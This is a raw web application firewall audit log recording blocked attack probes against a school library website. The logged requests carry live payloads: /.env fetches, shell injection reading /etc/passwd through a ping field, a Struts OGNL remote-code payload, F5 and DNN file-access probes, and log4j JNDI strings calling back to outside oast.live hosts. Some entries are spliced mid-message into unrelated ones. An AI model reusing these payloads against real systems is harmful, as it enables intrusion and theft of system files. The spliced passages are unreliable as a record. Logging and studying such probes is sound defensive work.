Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284306123205 2706 (- - -) Stopwatch2: 1748284306123205 2706; combined=1146, p1=386, p2=734, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f489f10-Z-- --214aa10b-A-- [27/May/2025:01:31:49 +0700] aDSzlXFOzWd_Ai7zJXUkMgAAAAI 103.236.140.4 56602 103.236.140.4 8181 --214aa10b-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168852924 --214aa10b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --214aa10b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284309098820 2091 (- - -) Stopwatch2: 1748284309098820 2091; combined=1230, p1=327, p2=882, p3=0, p4=0, p5=21, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --214aa10b-Z-- --e93a0552-A-- [27/May/2025:01:34:20 +0700] aDS0LM-W3hHsdQpQwdTafQAAAMc 103.236.140.4 60864 103.236.140.4 8181 --e93a0552-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e93a0552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e93a0552-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748284460430361 777 (- - -) Stopwatch2: 1748284460430361 777; combined=273, p1=234, p2=0, p3=0, p4=0, p5=39, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e93a0552-Z-- --de2e3839-A-- [27/May/2025:01:39:14 +0700] aDS1Us-W3hHsdQpQwdTfZgAAANg 103.236.140.4 40852 103.236.140.4 8181 --de2e3839-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 159436077 --de2e3839-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --de2e3839-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de2e3839-E-- --de2e3839-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284754124029 2165 (- - -) Stopwatch2: 1748284754124029 2165; combined=761, p1=537, p2=194, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de2e3839-Z-- --4f6d7752-A-- [27/May/2025:01:40:12 +0700] aDS1jFSmKJQK-9oQ9STyhQAAAJI 103.236.140.4 42286 103.236.140.4 8181 --4f6d7752-B-- GET / HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163030780 --4f6d7752-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4f6d7752-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284812601114 3769 (- - -) Stopwatch2: 1748284812601114 3769; combined=2450, p1=409, p2=2007, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f6d7752-Z-- --5dffa457-A-- [27/May/2025:01:40:12 +0700] aDS1jP7lSIOiZEhmvSz8HgAAAFI 103.236.140.4 42278 103.236.140.4 8181 --5dffa457-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 159436083 --5dffa457-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dffa457-E-- --5dffa457-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 168900306 --83854a08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83854a08-E-- --83854a08-H-- Message: Access denied with code 403 (phase 2). Pattern match " HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --04a5eb6e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --04a5eb6e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748290163312300 5915 (- - -) Stopwatch2: 1748290163312300 5915; combined=3957, p1=740, p2=3083, p3=36, p4=66, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04a5eb6e-Z-- --c040c073-A-- [27/May/2025:03:11:01 +0700] aDTK1XFOzWd_Ai7zJXVrAAAAABQ 103.236.140.4 56224 103.236.140.4 8181 --c040c073-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.254.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.254.53 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c040c073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c040c073-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748290261014304 752 (- - -) Stopwatch2: 1748290261014304 752; combined=310, p1=269, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c040c073-Z-- --b347c438-A-- [27/May/2025:03:19:44 +0700] aDTM4M-W3hHsdQpQwdRLggAAANI 103.236.140.4 42502 103.236.140.4 8181 --b347c438-B-- GET /?x=${jndi:ldap://${:-359}${:-857}.${hostName}.uri.d0q9cd1gpeook7mlf7sg9d1u1yeuuybph.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620101 --b347c438-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b347c438-E-- --b347c438-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748290784118941 8687 (- - -) Stopwatch2: 1748290784118941 8687; combined=6910, p1=460, p2=6406, p3=0, p4=0, p5=44, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b347c438-Z-- --3c37f169-A-- [27/May/2025:03:19:48 +0700] aDTM5M-W3hHsdQpQwdRLkAAAAMg 103.236.140.4 42502 103.236.140.4 8181 --3c37f169-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-359}${:-857}.${hostName}.referer.d0q9cd1gpeook7mlf7sgz88jhr3egsyt3.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-359}${:-857}.${hostName}.useragent.d0q9cd1gpeook7mlf7sgqwr5ezopxz8e6.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-359}${:-857}.${hostName}.accept.d0q9cd1gpeook7mlf7sgdksanjt447dun.oast.live} Accept-Language: ${jndi:ldap://${:-359}${:-857}.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgemyouoa35a8fc.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sgbb5tpcd6uomfh.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sghjhbwihtweo1a.oast.live} Authentication: Bearer ${jndi:ldap://${:-359}${:-857}.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sg7qxsjif1pw6g7.oast.live} Location: ${jndi:ldap://${:-359}${:-857}.${hostName}.location.d0q9cd1gpeook7mlf7sgsoirkz3ehenuk.oast.live} Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.origin.d0q9cd1gpeook7mlf7sgsqrc1p6cq6x4u.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-359}${:-857}.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sg7u8tuj7hnb5oc.oast.live} X-Api-Version: ${jndi:ldap://${:-359}${:-857}.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgh4gxhq6xbxoro.oast.live} X-CSRF-Token: ${jndi:ldap://${:-359}${:-857}.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sgp9ebuiuckg8nd.oast.live} X-Druid-Comment: 
${jndi:ldap://${:-359}${:-857}.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgh9tr6sps1dawq.oast.live} X-Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgq6bzkgb3yzu4r.oast.live} Cookie: ${jndi:ldap://${:-359}${:-857}.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgn7xwozianz41i.oast.live}=${jndi:ldap://${:-359}${:-857}.${hostName}.cookievalue.d0q9cd1gpeook7mlf7sguoggfbk19i5kh.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620104 --3c37f169-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3c37f169-E-- --3c37f169-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748290788100290 4525 (- - -) Stopwatch2: 1748290788100290 4525; combined=3475, p1=453, p2=2999, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c37f169-Z-- --749bdb23-A-- [27/May/2025:03:39:07 +0700] aDTRa8-W3hHsdQpQwdRZGQAAAMg 103.236.140.4 45744 103.236.140.4 8181 --749bdb23-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 163090568 --749bdb23-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --749bdb23-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --749bdb23-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748291947118398 4341 (- - -) Stopwatch2: 1748291947118398 4341; combined=2730, p1=470, p2=2185, p3=23, p4=28, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749bdb23-Z-- --645e244a-A-- [27/May/2025:03:39:20 +0700] aDTReFSmKJQK-9oQ9SRPvgAAAJU 103.236.140.4 46150 103.236.140.4 8181 --645e244a-B-- GET /?x=${jndi:ldap://${:-359}${:-857}.${hostName}.uri.d0q9cd1gpeook7mlf7sgj5984xj3d7h81.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163090586 --645e244a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --645e244a-E-- --645e244a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748291960115564 4846 (- - -) Stopwatch2: 1748291960115564 4846; combined=3272, p1=423, p2=2808, p3=0, p4=0, p5=41, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --645e244a-Z-- --3bf32953-A-- [27/May/2025:03:39:25 +0700] aDTRff7lSIOiZEhmvSxXXgAAAEs 103.236.140.4 46310 103.236.140.4 8181 --3bf32953-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-359}${:-857}.${hostName}.referer.d0q9cd1gpeook7mlf7sgn739rqqaoujuw.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-359}${:-857}.${hostName}.useragent.d0q9cd1gpeook7mlf7sgc5fsc3stu489u.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-359}${:-857}.${hostName}.accept.d0q9cd1gpeook7mlf7sgdhxjg53nnambg.oast.live} Accept-Language: ${jndi:ldap://${:-359}${:-857}.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgzdqwjumscb5ug.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sg4z3ds4wu4dr45.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sg8ecm75zsdu1jf.oast.live} Authentication: Bearer ${jndi:ldap://${:-359}${:-857}.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sgi8757d38r5go3.oast.live} Location: ${jndi:ldap://${:-359}${:-857}.${hostName}.location.d0q9cd1gpeook7mlf7sg5p6y7e3z9dgsc.oast.live} Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.origin.d0q9cd1gpeook7mlf7sgj8mt3skor4z5z.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-359}${:-857}.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sgqch5njbf6cz3w.oast.live} X-Api-Version: ${jndi:ldap://${:-359}${:-857}.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgtyhis3aeuacdo.oast.live} X-CSRF-Token: ${jndi:ldap://${:-359}${:-857}.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sgn818nhfq8qhra.oast.live} X-Druid-Comment: 
${jndi:ldap://${:-359}${:-857}.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgw61pm6gqk6rs1.oast.live} X-Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgm8r66yzjshwfw.oast.live} Cookie: ${jndi:ldap://${:-359}${:-857}.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgoages99sajf7o.oast.live}=${jndi:ldap://${:-359}${:-857}.${hostName}.cookievalue.d0q9cd1gpeook7mlf7sg8oh61myc31rsb.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168967279 --3bf32953-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bf32953-E-- --3bf32953-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748291965121408 4059 (- - -) Stopwatch2: 1748291965121408 4059; combined=2834, p1=286, p2=2521, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bf32953-Z-- --0f48973b-A-- [27/May/2025:03:48:18 +0700] aDTTkt6cNBpj1JOkpQk_fAAAAEo 103.236.140.4 55668 103.236.140.4 8181 --0f48973b-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168409233 --0f48973b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0f48973b-E-- --0f48973b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748292498100246 2713 (- - -) Stopwatch2: 1748292498100246 2713; combined=667, p1=503, p2=129, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked 